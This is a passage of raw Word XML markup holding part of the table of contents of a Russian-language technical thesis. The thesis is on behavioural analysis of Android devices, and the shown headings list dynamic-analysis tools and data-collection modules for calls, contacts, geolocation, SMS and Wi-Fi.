                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505538 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>27</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39" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.5.3</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Проверка окружения</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505539 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>27</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40" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.6</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Обзор средств проведения динамического анализа приложений для Android</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505540 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>28</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41" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.7</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Выводы второго раздела</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505541 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>38</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00007DA5" w:rsidRDefault="00F870DF">
          <w:pPr>
            <w:pStyle w:val="15"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="560"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9344"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc61505542" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ТЕХНОЛОГИЧЕСКИЙ РАЗДЕЛ</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505542 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>40</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43" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Разработка архитектуры сервиса поведенческого анализа функционирования мобильных устройств на андроид</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505543 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>40</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44" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Обоснование выбора инструментальных средств для разработки ПО</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505544 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>42</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45" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Общая схема работы системы</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505545 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>43</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46" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Возобновляемый фоновый процесс</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505546 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>44</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47" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.5</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Запуск модулей сбора данных</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505547 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>45</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48" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.6</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Основные модули сбора данных</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505548 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>45</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49" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.6.1</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Модуль приложений</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505549 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>46</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50" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.6.2</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Модуль вызовов</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505550 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>46</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51" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.6.3</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Модуль контактов</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505551 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>46</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52" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.6.4</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Модуль геолокации</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505552 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>47</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53" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.6.5</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">Модуль </w:t>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SMS</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505553 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>47</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54" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.6.6</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">Модуль </w:t>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Wi-Fi</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
